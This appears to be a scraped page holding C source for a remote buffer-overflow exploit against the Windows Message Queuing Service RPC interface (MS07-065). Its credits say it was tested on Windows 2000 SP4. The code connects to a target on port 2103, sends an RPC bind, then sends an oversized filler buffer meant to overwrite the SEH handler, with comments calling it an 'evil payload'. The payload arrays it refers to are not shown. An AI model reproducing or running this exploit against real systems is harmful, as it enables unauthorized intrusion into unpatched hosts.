推荐:MS07-065 Message Queuing Service RPC远程溢出分析

void Disconnect(SOCKET s);

// ripped from isno
int Make_Connection(char *address,int port,int timeout)
{
struct sockaddr_in target;
SOCKET s;
int i;
DWORD bf;
fd_set wd;
struct timeval tv;

s = socket(AF_INET,SOCK_STREAM,0);
if(s<0)
return -1;

target.sin_family = AF_INET;
target.sin_addr.s_addr = inet_addr(address);
if(target.sin_addr.s_addr==0)
{
closesocket(s);
return -2;
}
target.sin_port = htons((short)port);
bf = 1;
ioctlsocket(s,FIONBIO,&bf);
tv.tv_sec = timeout;
tv.tv_usec = 0;
FD_ZERO(&wd);
FD_SET(s,&wd);
connect(s,(struct sockaddr *)&target,sizeof(target));
if((i=select(s+1,0,&wd,0,&tv))==(-1))
{
closesocket(s);
return -3;
}
if(i==0)
{
closesocket(s);
return -4;
}
i = sizeof(int);
getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i);
if((bf!=0)||(i!=sizeof(int)))
{
closesocket(s);
return -5;
}
ioctlsocket(s,FIONBIO,&bf);
return s;
}

void Disconnect(SOCKET s)
{
closesocket(s);
WSACleanup();
}

/****************************************************/

int main(int argc, char * argv[]){

unsigned char * target = NULL;
int port = 2103;
int i;

int ret;
char buffer[6000] = {0};
SOCKET s;
WSADATA WSAData;

printf("--------------------------------------------------------------------------\n");
printf("-== Windows Message Queuing Service RPC BOF Exploit (MS07-065) ==-\n");
printf("-== code by axis@ph4nt0m ==-\n");
printf("-== Http://www.ph4nt0m.org ==-\n");
printf("-== Tested against Windows 2000 server SP4 ==-\n");
printf("--------------------------------------------------------------------------\n\n");

if (argc==1) usage(argv[0]); //Handle parameters
for(i=1;i<argc;i++) {
if ( (argv[i][0]=='-') ) {
switch (argv[i][1]) {
case 'h':
target=(unsigned char *)argv[i+1];
break;
case 'p':
if (strcmp(argv[i+1],"2103")==0) {
printf("[+] Attacking default port 2103\n");
} else {
port=atoi(argv[i+1]);
}
break;
default:
printf("[-] Invalid argument: %s\n",argv[i]);
usage(argv[0]);
break;
}
i++;
} else usage(argv[0]);
}

/********************** attack payload ***************************/
if(WSAStartup (MAKEWORD(1,1), &WSAData) != 0)
{
fprintf(stderr, "[-] WSAStartup failed.\n");
WSACleanup();
exit(1);
}

//Sleep(1200);

s = Make_Connection((char *)target, port, 10);
if(s<0)
{
fprintf(stderr, "[-] connect err.\n");
exit(1);
}

//Send our evil Payload
printf("[*]Sending our Payload, Good Luck! ^_^\n");

printf("[*]Sending RPC Bind String!\n");
send(s, bind_str, sizeof(bind_str), 0);

Sleep(1000);

printf("[*]Sending RPC Request Now!\n");
memset(buffer, '\x41', sizeof(buffer)); // fil the buffer to trigger seh
send(s, request_1, sizeof(request_1), 0);
send(s, buffer, 5104, 0); // fil the buffer to trigger seh
send(s, request_2, sizeof(request_2), 0);

Sleep(100);

memset(buffer, 0, sizeof(buffer));
ret = recv(s, buffer, sizeof(buffer)-1, 0);
//printf("recv: %s\n", buffer);

Disconnect(s);

return 0;
}